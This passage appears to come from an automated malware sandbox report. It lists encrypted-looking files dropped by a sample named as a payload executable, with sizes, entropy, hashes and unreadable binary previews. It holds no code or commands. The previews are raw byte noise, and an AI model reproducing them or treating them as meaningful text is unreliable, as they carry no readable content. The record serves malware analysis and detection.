                                                                                                Preview:<?xml..{=.1sOkEy+.S.........=......>k.6=~....%/.....g..{.PY.sI.fLdO+.L..([..G..-nS..P.*.T..W,..6....S..&..s]?E.[1.Q.%?k.=R..Tl.).t..a:G^l..*~...(.w..*.(.G.......M[pW._..(.M.....|o. }.mG..@.'.t.G.L.`...X.P..@Qy..KOm-\.:.k..|OD....n...j..>...m......~..O]z.?.......`kyI....P..9..}.1R#=\......-.`........T........v"A._.7.P..,..BG...s.]l...R...(w..M..x..]..AD...$>..r...c.A.s(..e.7..3...2....#M.qS.>.V..ut..9+...6....e..z.;....V"tFX...O!....8..I)u..E.\.c"&..c...[v...D.L..<...W.D...Mk...;.2...p5.`.M..Y.@.~xLOHYD.....a8..d........./T.0.^.k.S.45......,zj.L.u.......sY...".;Dy@.J:.J..6...r~B.u.m..N.E....]&S{.......p`i.tM.D.x.^.pU......b........W...#6...l\A.q. .......?.K.....XR...M.H....f.....*.yzZX.....t..,<.eh..............bK8...nW...!.=n..s.5..)..g..k.a.-/.O...<Eb..$:3..&<.. M.@..BJI..n.rw...R.L.d.|.k.i..h.._...........ZX.o.Q...T.k<...`Ot$..*..f.K.2...Z=...mw/Q....d.1..Q..OP...C.<.%d.0.H_.....Y.i^I..8..l.z......W9.5,.. |U.%H[..7Q....?..(v...d...'
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1869
                                                                                                Entropy (8bit):7.899610724712136
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:zulbgHQOpBdn2B6zlR2PP0bVVjdFcpNh+gGIVALRxsLD:il0HV3n2spRE8BV70NhAICM
                                                                                                MD5:AD9B3DF65B2BFC14B88D4D6C42D8AED2
                                                                                                SHA1:7A93D3139AFE1E192BE5AD8F9A232265302CE877
                                                                                                SHA-256:EFFFDA5B6EC076B34079DFA2F264F10B0E495D99D8DF132B3DFD34D4B0BE8790
                                                                                                SHA-512:B899B996DA20B5DFA14AC31D903040B1FDE5BC826FFAA9D93B6BBA6E853B1572306A204B82095E0A0308CFA8A908EE5AD5131814CA4F7381EAC45F86BDFC0921
                                                                                                Malicious:false
                                                                                                Preview:<?xml.n...Ba.....8.4I.....!..........%A5.....m#.X...F.Q.1%...V~....v..LIQ...>x..W+..M.>L...Q....@].Q..YH.$..:.PH.9...(......9....&m+..-%.Y...?.K..~..Z.f.KgK.=..<}<...y.eMY....,.*R{".B.=......0@..'...+{.W..JD/..@~R5.. A.....4..&..b.|..S..&.....F.....b...4%..Y.$....F`}..7..4...k..v..A6'.HDd.Iy...}`9.i}D_@.9G.@...M.....,...c....>...w.oy>.~.1.e.!-F..ZK.~...50.S.+.G.....]..h.3...Y...Ta..}D2..P.}.1...+.mrhs.$;dp...}sue...(.P.M...svX.@c..d..y.=e..........P....d..y.8b.\.."......q...Tb....q.1....H\*.....14...i2....,%pQ.6.u3Y..&...G......*..U6...w...d9.?...H&t.~w]sVT.(.=...,f..J:..L..L.S....h;2...Kta.r..,.+..</.n&..N...i......S.VQ..}........f....}..pU...A.7?\...<.2./.gH>.W.( ..Z...e3..v.....H..(3s.[-..-.+_.......D...P....w<._.e*......5...2....~A.k$%......[..~uHms..7.b.#...u.W.....K.n...._........4..C....]...z Yx.... Z......%..M..R....5\; h..w....fW.&...}mv.......c|xP.48.b8.]m..>....wU.n.....p8...>.f.Q.].....)..".RpX..-@...j[r76..V....^.n.....V..d4\...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1358
                                                                                                Entropy (8bit):7.832626810566317
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:gSLtT9sVMhcN2R6povPYv3wUpJiDzmKeZ+JgNpZpBJPGpHPeABTbbXFEGmzQjx3X:gSxClNdpAuwQom/8gN57P+PJVEGWSLD
                                                                                                MD5:F878E18652BF1489B07841D6AC1B4F73
                                                                                                SHA1:A058A9344139186F7BD6A4C6317C44E9AB6D5ABB
                                                                                                SHA-256:A47D4B293D1D7FACF0DA2D3583B862B9FC261D7301DD8D1494FFE161C8D290B6
                                                                                                SHA-512:A17266D102620F0D38D09BC5F8290DFED0EFA5B6DA51E2C3F58DD911B00450F94C146A743A0BFA670EC7DCDADCEF381F34C2CEECDBFFD4CA88C9E3194E862D43
                                                                                                Malicious:false
                                                                                                Preview:<?xml....ZI..9~K*g.ge.#U4..o..Y.4...IA.T.b..A.D^..>..a..[...v8.6.I.$~.....`t..o73WK..w..."...6U0..afG.1..Y...E..e.JO9.......5D0.B..]{.,.qt.ef..6g..r.....PpI.H.@t*..F.D.qY..NRu.f....AJ.E'...o..,....w..U..7?f....p....B?@.L.?..yh.I..jA..;.3.4T.+...C...4.....!..:....g.(.e..C.8..*aOx..`.'.Z,f.*k.D:.8.w...lP..c.lv.83.y.\*.d..%s.kk...x..........a.|...;N..r..G.<...9._..lG*.......W...6.SP..*$GQ....f..'..............X........~4.2....$._..w80..di3......9..:..u7.. .XvT.y..a.9.&.....|.."A).+..........u....}Zi.R.c....i...\gu.z........,.s....+...5.f.C..._`..9..U.aN.lN.wiK<..Q....+..".../rwJ1i....?..I^vU.F.F......v....62?b...Y3...:..1d...I..jt...f1.........R#V..k..w.l.H.'.`.....jOO.}.........e.6.......<...+Wv.,...d......)Q..,....X>....6...a....+.4M...`..j...?m..9......\.{....6..N.....?.p...t..;u....C...D.....<..{.....?.&_.B.K..C............v.......H.Na..0.0A2..\;.{2.1b..O..n........)I..S%..K[..Ks'....u..'S.@.Zv+h..f......._......_.l.H..E2.N..3y...]=..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1892
                                                                                                Entropy (8bit):7.89242878927459
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:69KiAoTdFm22WMjvriJz3vUgDUaA/KARt73JOeLD:doSJVjzwz38gD7E5vDJOm
                                                                                                MD5:23DBFEBB8E1CCBE2D5590E3F70CEA180
                                                                                                SHA1:C196A78B4F5996E36E272525BCF10BF308C70542
                                                                                                SHA-256:E74E01AF8D5F0A024506836348E0826A7FC539F34CA02BD8F41F5332B158813E
                                                                                                SHA-512:1AF6006DEA12F9D6992BF96B06E4B819738307F162813D70E0F8DBB72C60BD8250602A9084B9CD1E177B947D9178DE08F9197C4E961F3778A12F078D8F2A5AD0
                                                                                                Malicious:false
                                                                                                Preview:<?xml...Z...F'. %..X..n<k......bd.q....;>..Wn........F.$......izb...*....q9Wd.uV.9..l.N.'..U.......Z...z]$.6.h..k..w......C......;..E.1(cQ...D...J.j.A...ax....x.`.......Y%..7.g..P.o.J}...R....oD..(...j.Pv.E.9....V.u....M{p..f........Y.....l.}..=......W9+."yj...-.b......%.9]{.\SA@....%.%O.fl(...T...Q.....~...M.........N*.Q...K..[......~.;%...=.=..x1=:q..|.$.X.u"?d....OQ....Dt.~.....J......cZ.3.b.../...l.@..iT.l..}Y...8b^..n....R.=.@...._e).q.jr..Q.p..t.CiOy.....;..R..K..B/Da?i......._.u.K...=0.U........KGh.7.q..fD......y!aZ.{o.{1.{....}.kp..O..00s.aI....%@L....a...Q9...Fue..E...EZ.h.*..0Gn.p...2.D........G(,.GD.D.../X..`..Y.4.E=.Tx...\\.S.Le.v..=U3m......e......7r(..8../%..y..c..C.]!.d.X .F6....M=....ebF...].......<..`..D`.o~.7cs.+.ng..{......9.)..O........X...r.\..f.zz!..Q.8r@.@9.....M1..5....8,.M"..pH ..$..W.....fUQW.-H%K/.*FlAo..:Gk.........u.0zv..Obw..cZ..7_o..K.. ...cG..'\U..s9.oTE....u...{.`8V.LU9G?....R....A.r....7SO.a&.."...g.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1144
                                                                                                Entropy (8bit):7.815686404302281
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:HDsaCBf1QRJPogk1Pc6oWBI3nwlOkDMUXi+JASRO5Z7ZpIeP4x3bD:HD41SPo71kuWMOkDMCC7I7LD
                                                                                                MD5:7C37E6FE030956D68D005602A389B0C0
                                                                                                SHA1:F2EED70E269C19939869DF67BE6B7A05DC162126
                                                                                                SHA-256:53498C92ED1C8A746C3A7C6B31A2197AF2EC366F1EB23B86601D116B5E2CADC7
                                                                                                SHA-512:484DCC311B1DA40665F6892E8FDC56DE97D66D51030BA21B616BBD739284DD380481AB8E34D8CAC02888A66DD2C93FE4E545A672EA68157EA88CD72301F0926A
                                                                                                Malicious:false
                                                                                                Preview:<?xml......y..!h.,.E...".....o&IW.k..G.N.W.6...u..x......j0*.9.|.............".q...0}V...b.v..:m?.f.......i.y..tQ..S5...=W.&.N5.....g[h..........Z..q..'..9.+L.......n.z..ZD;............M...U..[..t.....G..3.@.=...._.S..e.k...bY@6 ..~dg.|..D.Q.m..o.4.6p..w.}.l....!".q.Z*.Q.!.q.c.Z;.Cu,.."......B..!&..S....Tw..T/..g].Q..H....#-.Q.;...@.!u....Z..=j....6...}y. ...i-...3k...pd...~......^....D.2.m.}...........jgF..X..%......%9.-...v}.h..^ae....h..[..3..?0.2o....~1...........V.........>.V..&..C4H...]V.t.0....?.p;+....P..F."....!.Z..B:/v...#y..b......#..\.........&?..T..j.M.'w.:e..U'.v.X. 0[~r.8...U........8..+..u.24~$.J(}.`#~..c3;..{.%d.@Q.6..+>!|]Co.....D..i......>.K.IG 6.9R ....n..aX0.Yn.L.(P^.....g..R.fh..$.PVJ.Y..vO.a...[.T..J.4-...v.....2...a7..p&.qG.v........+io.9K...{$.g~..{=.AR.z...&2u.......U..r^b........~....I.1.......0.,...V.?..v..1..npB3......IV.......X.z...o....,......1>..........U....Yz......3D...M.......w..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1967
                                                                                                Entropy (8bit):7.899729631190829
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8UXnP5tUwYCEXLrtjS4CJNHcL9ESYTJB8rftZcHJLD:Df5OwYCwvi8E5D8rtZ09
                                                                                                MD5:DC67F2FFA3473A11DDBEDAB557C74411
                                                                                                SHA1:EDFE22686E942FAFEEF9B8CF72ABE739F01B8AEA
                                                                                                SHA-256:6032406482607528C9AD80F04F49C7E983E8A79D2EBBC49FFF9054688DD3B41E
                                                                                                SHA-512:651C87595AEDB63FA45771B96A367AE95209C88773F81615FFFAF6F4817F82CA99307FA630F695ED2E8BDB4B5C74D993A983135292068E928EA4B07114CED14C
                                                                                                Malicious:false
                                                                                                Preview:<?xml.4..R.qv&...zL.....Ri...b.6!.w.p....I...#.9.)..9... .......;...3.g.;..s.1..}.;.._..M.....0....bt..Q...:..U...$<~..,..p...L.jt...VJ ..<..._#Q..<Nl..b.....;H.4..33..j...9....v..x.D.....A.!F.q..t......L...C.?S.9.1.,]ogPJ.TB...~XP..y..4.AQ.....$..........\.+..........M....S!......Vi.|.V2.....;U.R..8.u......k...@}.c....*x.[[...v.....A...9.d./.]<w..(\-..`0i..~.h.2..qD..........j5%a.}.yJ*C>P<U.-.AHQ.....I...j\.....HF......F}..!.".%ni...q..'..Z~...1..U.w....._..\..>= .lB..o........'q6...vJ.c....?.U%?..|..0Z..u~.h.Q..S.id.D.Bl.n.H...H>...o7..q....7....z.!)....].A.r.....d.i..L....y..VM..Q.....(........./t......)................g.....-....Js.Z..{..v..wq......N...B..(...Cv..:...Dv|......+.6..c.X%.....|..u......Q4t3.....:<......~.#D..m|;....r.5...J ..#.9....k..@..D._..i.2Q.!........2&.)A...d.T..lJ....[s...ky..s..-..<........#.v..L...4..e;N...Q\.....w......G........o.x..d..?....*.t6.f.G....'S]n..{y.H*..L.8..GM....."w...]....l..US.....=...T=T4
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1427
                                                                                                Entropy (8bit):7.870573535321773
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:z3T/hidg42iL1Iqf7TPwMfsFbaaTJjAtNwo8H+znpx00Gbqu6z8OGkztHx3bD:z39idg42I1Iqf7TwMfQLMNP8ezn6bZ54
                                                                                                MD5:73FAA83267A0A278EEFD3B74D9A04AB5
                                                                                                SHA1:22CB0400628743396F83E07D0ECCDE005D85F5F1
                                                                                                SHA-256:B7899F0B0EF8B4DBF412BAA36D7BA00E70DD8420648C13F29A24C33A310A27C7
                                                                                                SHA-512:AF9CA4242E28BBCF6D954FFDC54A7E120484571E2FB6C125AEA2F82DE4CD17B8695871C35A773C86DB70497C3130A3297C093F9D1E8DCF1D7BD4E3A89EB2AC99
                                                                                                Malicious:false
                                                                                                Preview:<?xmlZ.*..U....b..b@(...d..3...U...Q.>...;.~...hX.....VP.~...9...<.L..iU.{F.W=.IC.Ftl.w.Pto7-..$a:1..%.f5.0....2N.r.......A...c.c..]%.K,....z..dA.....y.e_.~..]]....X.ve....JQ.1s.l..u.~+x..:.......9V.r.s.)..,.>.k..*...Z....T....Gw.?........`..p4..n.d.ps...PD.wD./..T..fc....?.;.i.Q.....vO..'U..YI..Cx..nV..N.z..7U.M.(.X..&X"x>rR%.....)...F.ag.y.ICF....$..8..+P.V1yo...`.8M..1....(...!..,_.....L.u. ?.q......sK$4|..X.g0...yL..D.q.2x95.ei..E...OE`.Y..c2~..ZNb...<..=......Stj.[. .`...8.v..Cy9..z..)7.Z>..{.>4......Z.t..b...:WKy....=V.....d..z..rGB...a......yjG...f.!.,.UeE..rT.....0..aY2.!.....\.^.[....3.)... N.0.(...l..G..../@...l!.......MIm,;./..@.....T.&....Ga.......X.(..y.... ........|/..`P.;^v..os..2f.....>...t...d7i$N,*].*.7X.Kz..T..n..^..I.E..%..O..x.m@..../...w.`.c.[..h.2;\uO...........I.+/c...'....:..$.#.++..b...r...r.3.........%.f...v.d..E....:-.!r=....?..5....T....:.~..7C.}...Z|..[..w[~.1.l...|..C.........A..#.M:.-..(.<rc..#.Z..a".
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1528
                                                                                                Entropy (8bit):7.883998157754028
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:obw7aD/SNMlbft2Mp0Y3kO8VipyzsIdYI9ml0WMMSWqdG4p5JxKJcT9l+LH0l3du:vaDaKbF2MJh8o+IkPpjWq44pjw49lei4
                                                                                                MD5:57EC8ECD7DA1722024272EDC82C1E629
                                                                                                SHA1:1BB45C41B2A49DBC114B6805AABC657A982AAFE3
                                                                                                SHA-256:14E8715C99DD2CCA36F98C10FCFD72F5A2A4DF9C4F181D65E5515EDE8C6D4A70
                                                                                                SHA-512:3CBC506AB407EC0046A0750656ED6D9EBBED6DD6C5418ED68DC3864CD162E1B6366191261B3E82FF05358EAB6E879DD30DB6F2908A3DEECE5DAA08E9D891701B
                                                                                                Malicious:false
                                                                                                Preview:<?xml...p..i8.k...*....W...HM.........p+..y.]Q..Nb.J+....?...Y(@.....<..YW.Z....T.7...7:.......)P`.o.......N..<.t..........}(...Y...%..'.....@............<7&).+~.foPMY8x_iu ..E"...bg.._..d.f..9..V...)].W...:wR...#...E.a.\9F|........a..Ehu.8/.n3......P.:....{.4@i..J.P...+....0V....u&..H{.j`.kX....OZP\S_......`Tx%..'QH...3.m_.n.:.F.q.........$|.w...m..|...[.9ZWjo.d...%2....$H...R.......zN.`..S.....e.^.H'.U.( z4..H..q..!t.O.{.9y.... eo....-v..4.........GZ.......v.c...F..u)I&*.b.NH@.F..=.._ ..(..,.....D.B.&.'.I>.5.nv....yg.<e..m[|....1..0...p...u%5......S...H.M.O.&)....m.ZY.../.y..I....`E.i......6..6..pM;aIH$".g..ODbN}=.2^..3...C.....f|....C...(.$].....<.1..g.......R....&..MLt9}^.2.Pdc......,....^...:..K.+..;..I.....]..:w'.....?9.1.s..s.<M.-.Gq...2.g......K|8...Sk...O(xa:...@.....%..g{...n/8.k2'.1..n.Z$D....8.4s.....n..ua...x.l{.a.(v.)".W.F-...l ..>'.5.F..C$..dA..9...... .*..{...5...=r.....~.u..u.{J.x.qW.....g...........C..\v.K$6Z.Y=.X1X.%..G
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):7.824195925952176
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YBcvuhfwl+TqlLN5TdeV1YuTRq+J397laDhFbA8GoUUmzZOPIXXQO3Sukx3bD:+hIlTlvTmTx97lQb7GNJXR3cLD
                                                                                                MD5:E807784FFF8E636B219F1AC77B131DE3
                                                                                                SHA1:D10BAD6A32B7D3002A9D7F418B20D6050DA549FC
                                                                                                SHA-256:7CEBD0C71B4DD49BFB571A6F4E2C94180A74CA55B4A0BD9465ECDBE86450C506
                                                                                                SHA-512:FFC95DDE81B31B44873E17BA04D819718CE0A974DAA72669F4A2217D19CCA426B707B9F3F8A8125ABD4F61AE25829779789AABC0747A62958BDCAAC14EAE7E8C
                                                                                                Malicious:false
                                                                                                Preview:<?xml..V...C..M.F...3..X../a..LZ...9.<k2....b.%2..g_]_.$..n .vo......Z...L_...7.0...+w.28y,Y......r3P..nLsP..w.`..'uLA..bd......L.;.S....G$.. p..J....ZX...Pm......}l..m..q.....^ .......A....M*_.....}.........._8Dd.1).V...u.qm4...`..H....5U......J....O\)4........`..F#l..uI...A...0...=._.[........<.....ASl.L...Q7..o...2.\". O.$[......c.I..p-....W...+/DK.....fg..|......x.!.E.@.aV>.:.t.(..c.A.O*....z<...Y.._De%9.n.w....9..G...|m.QG....v......@....l^k.. M/N......J.}(@U.Y..S..9..95.K...R... ./.;*.=..f..D.....9.*.`zM..)!'..Lq...4.vt.......I%{..4.-..uCO..Ju.X...8.3;.....7!Q.>2..P..t......4..?.....gx.........m.A:..]....>...=.U..7.`>..m..".@.J.m..\.Z....5mW.N.h..%.$......4_....)...U..V...,xGa...f..#....VK..k.]?1GKC...-..8`.G.j%..kq.x.).S=....h..5.W8........H ....].]d[./....."L;...;YWp./.O...k+fU2.Up..#.......G...$.....oUj<.....qf.U.;..>!k.Yt.44k.i......J}......e........4..i..Sv_(8d..x.#EM....8._...2..>g%..._1...9J....].c.|y.......n.....S.m.3p
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):866
                                                                                                Entropy (8bit):7.698154459981672
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QuWXGQcKwErj47SA92+UmYI7AxCex2TfKQCIN5x3bD:EGBK3rkSAVN7AxDx2bKQPNDLD
                                                                                                MD5:1C2F2A08110250F6E28751212757E1E6
                                                                                                SHA1:BB3F7BBDCFD9E3E52C2C636DB263A11EBC940BBC
                                                                                                SHA-256:5AE1E787732EA9EEC12E5440B259E9BE82A7FAE2E4B17A562DAE78B88CBB82BC
                                                                                                SHA-512:7A35B910FBC4EB84AF49418219EFD2446B4B95B42CDE020D51D1A2D6AF61E2EDA5D0C74EFA0DD6CF63CB8526056A765283EAFE510E079DBA3C41C2473AD87463
                                                                                                Malicious:false
                                                                                                Preview:<?xml#...G_.u@..3.g#..kP.....t....b..z%B...)&.G.S...OZ50..*F.....A.[..Fr....-Rp.aUG.&^......@!}..l.....m[.F..[.l.;...DpR.Sv.@.D....7..%;p.u...jG;..ISFJ..n...2..PH$%TuS..,.8)> ../..;...^..S.X....s.....h0@......S/..Q;%;..Z!l.....;....w.MW.%-z.l.s.R..x......e...'...^..M...?....u..R{...;$......t.-..94..K.K.y..i.!..%..34?CC...Q..:..[P....6...L.c..).Ie......l......./.a.. ..6.........zTW8..An:GK.!.DG5B..O..8/.3.l....W....]5..a...*p..P.*n..C..........2o.....\}...@.#g3k..?..y....pn.....r$..9.[s.#+.....}....^...}.%.FB..^...u0x.\u5...A..5....6....\....../....PE....& .m......FM..XU8..b;g]e.U.Q...l..c.wC.I.&.G.V|HF.... .......^...V.I.{..FA.$.1.I.tM..6...3g.v.o.7e.`o0.-.=U....$z...5...`..(#.?.<.*zs...>V.g".[.w'.....z......!...d%|.t.}......O..~ .q^BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):901
                                                                                                Entropy (8bit):7.772534132635996
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qjoriHRdbvOCx3nXwZLwmX2CW/PBU6m3m4rarL9gx3bD:womHHt5OUmX2CuO3zr8BMLD
                                                                                                MD5:048B4BD5D86FA8C7B4B54C8AFDB37F75
                                                                                                SHA1:ABB9CBC7CC1784B84A491F952DF9CF5A13AB2220
                                                                                                SHA-256:4CA94C216C677043FD362270567FED9E94A8DC05767F755BCD5E6C4512994F1D
                                                                                                SHA-512:12830DB299DDE3B2B8C8576BE2908B632BA8C57FEA2C3EEBD98F09BCF0CF002C94B32DF29AE2B1CF56A3960E4E2F66B467F748CE27EC95250A5045D59C5CD563
                                                                                                Malicious:false
                                                                                                Preview:<?xml.5..+J4B+.;..G.....)r...`vj...e8....`.Hu....z..Z..1.....l6......J...|.7...z....6.Ht.]*m.X..P.u..E..)....G.*.s...|...t.."K..\.....>.a.c.p.d...h..Y...::...`"........~.C.....*.!..MW....5.h<s...'.....MG.7.....`C....v.7+MIAV..a8].2...W.S. ...Q._.>u..w..Q..`...N..L...^.y...R7P..:.IL1..........z4...(..5......5..'.P..R.g.w..~...._v...v......R.B...,......`$1Yj.*.6...}..Fd.....dGs......{..ZO.z.........&Zs.R.*....5#l..!.Y../.}..4......9.!...S...d.O..\.....Q....@8o ?..x.Z.G4.....u..a.y...a.......08.&...D.:.B.3..d...e...r.0Oj.....%T?..\i..b,...Y..q0...x.........,...<Ty..f.#e1...8.E.A1.l.KK...J.j.7..W.I`.^....m.....V."....w.....>...4W.A^."Lk12.6...=.~.k.z.....c#..]..e.....>.e..G.....?.5d%F..%.H!2".-..rk.T...C..<.P1`._Lznb....&.|...z.a[,...4...p...n....%..!M.../.@.1E.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):860
                                                                                                Entropy (8bit):7.687176243755576
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:SxYf4mBiL5EmeGCkjtNg2js/mR1wrJ3MzD/I591Bv7SvlUSIUM5GeGFQv1gJc3cq:ocp4LCdGdBcrQDoBWTIUM/1v1x3bD
                                                                                                MD5:5C77B4FD21D4F4C113CD1787B0D761F5
                                                                                                SHA1:172FE0270758D36B9028ACDF75B2B55AB9E392D2
                                                                                                SHA-256:D3557EF40DAEF5EBBA841B4CB8D7B8CC3898992C3758D36557A4A6CD5CCB78F1
                                                                                                SHA-512:F05488A5719753B6876A9404A468091CE1B8D9645120A33F69370E6E6CECFFB900522BE072389F88EE911F0B3FC78CDA45568B4B6DC1F7C1DC67188A64F18AB9
                                                                                                Malicious:false
                                                                                                Preview:<?xml..$.s...b...:.^.T.uY.......mo.;...O.......L>Ic...Z....j...\..~.~.[......lO.}.Y..oI.JZ.=......Qq.......3..%]f..<.Lhb...YFd.7+8.K?_...K.C.k.A...G&q..o?..c..*......_.....UP0...@.bI....._..lg._Q...T..Q@....{.2..$(m....4...i'.h.4J..T.{.Gc..^.n....G#AWR.P...N<R&k..O.9s..6...E(.]....f5...2....^..T.0.BG}..W.G.z...s2A..T..>....WJ......q.=-2..y-H...F..K.....@.A.Z.)......9....[.wO........}O.v..A^.y....;..3...W...+.........V...>.,2.id.....o...J.C..........-.?W..6%..G..../....I1;W(.A...+..=.9.d.6.....K....W.......|j.J..P...vN..=.^'z..I.......\/..W..|.8z..I'h...n2z..X8t.p..~.U.;...Z%...q..Ws.n....Y.".4El...N...kt{Ax. ...w.......k.p*......1v.~...U.q.W~....n54L...y:C.3..@7Z.yu.,...{(.f..b...W.lX.........~........wd/...7`..m...^/..@Gc....%.0.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):760
                                                                                                Entropy (8bit):7.679673799386533
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8X6SSswVGjcrtacTDJMRxNocG8/JwtK4CwaRHOCIHNHF0ye1e16MJUHkgJc3ciik:G6S6GQrtacTDJMR8cJStXCFpaJF0ye1S
                                                                                                MD5:351A266C3D40F98174B99C0A7EB51D1D
                                                                                                SHA1:B0148482CAA5D96007D2FF9211EC38E4794150DC
                                                                                                SHA-256:5DE5C5B75D2567C0C052A4D78C2383F78F38D032494DE53BC6B295F8105C3303
                                                                                                SHA-512:0BF563547CE48071CA3A860CBD0653BB4B32CA4F68D21B026C331F1D7C8945B85DBC8A8A419EB4225F0C35542630B2FF8D6142BED50AAAA93CA8FCC4A71AAFD6
                                                                                                Malicious:false
                                                                                                Preview:<?xmlA..KP?...zX......r......a.}......,..;...../.j.N.f%......>..Z..;4.{(......"..Nld_.t.v./....\..,W...........M.ia^t..fYr....d....L.?XmI{...'.}.......d..^D..*.y:(..._...a.....7P8..#.~....igw:d....Ud.+...`^...1..n..u.(R..:fh...&o..?......o[..2...<..e..H.....dRN.#.Tq..:..r..M.'e.7.....#...#.%l..0.3}.i.d...b.1...3.Q9.D...;.r.X..=K...=T...z..Y...z(7-..D..[@.....2..V.[K...0X.G...%B.!ksicMyt...(............. .###...;..:...\Z|p%...^...n.P)m....,.~W'......%...Y6.;..N).'..H...I..!..d..(g.Lp..k........|..:.4...i...W.@.nN..+.....8 ..M..J.#.#,.....z.....\"....u05x..0...r.@...A..b7....^*..u)i...\ ..E.J....hg...{.....7.sp^...3[..o....>Y.I....\NH....NF.M.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1117
                                                                                                Entropy (8bit):7.8306717604378875
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OnBSgTv4UFdKFh6vZkbQj8tQGmShRdjBmaFBIEEoQ520sxXekWElx3bD:0BSdP6vZkbQ4CCdjQaFBIX3sR5WEvLD
                                                                                                MD5:158A3263297F8674DBAE48893533DF11
                                                                                                SHA1:5C1F16BE4DB63E90DAC3B92BC3AF22E97D04F56C
                                                                                                SHA-256:38D9A1E5A9F46CF1359882481AB538813C588CB207ECAFDD689B97B5F25A3924
                                                                                                SHA-512:0E5D9225C23758D0DC869901608AB384554C8E857D7C21B9E3303DD325667F8C9B91980564EF275D9FC0A78335BA51BEC5A79980261321DBBBE59E74C2CF9A5F
                                                                                                Malicious:false
                                                                                                Preview:<?xml.4..;.%..!i.l.x8...2(..K&PqC...t....).`...;.._Fo4.4.#%p.q...9......b..k|...../..."8..v-/.6c.6.$c[....t.P].%.@..1+...;pQr..B...o...q.).)...P...g.\PBtH...Z.h%.F6....{.@,.Mf.]..:X|.`..b..e..lQ&.?.m......~(y;....f-....&....~..k9.v.o...Y.uZ.."......&5...%.J.....]xe..p..V.. ..k.z.........e.K....w.-.$/...0....k..u.'.8...;.....F.+..Q...8.Z.Bal...!D9.X)-g..&'2.<......H..s5.S...P..)(nV...2[]*.z....F..N.>rv.i..u.......,....b..t.Q.....;pdd..K..}..(..wHS4..Y-C..E.#..J.z....vt....".5S.z/D.ea..*ND"I-.-....@.=..E...U..d.(@.)....Q$.....!.K...c..7.'T.r...=.M..!O.1....JI.:.....a...(._.Np......^.Uu"d,....4n..n.....B..M... .@....c;..J.l.L_.k.V.{sy=l.o...i0......g.C.j..f.S%S(.(,...|`.1...!....#.....;.-fs.4...`....|..S.EFc...<..-...Y.j.6l$...fN.......FY.........u..vR...kiA.....G.N.K..........U.E....o..b.w.I......d.xu7....A....T...xXP.W...cJ..yT.0....(.s3....z#..;..r...q..~..O.Q......D.....K.A..>.F.IX...03...v.i..}...Kk...9.j..6.f8I.3..J..5#z......VN`.*S.B..q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1025
                                                                                                Entropy (8bit):7.822978798726493
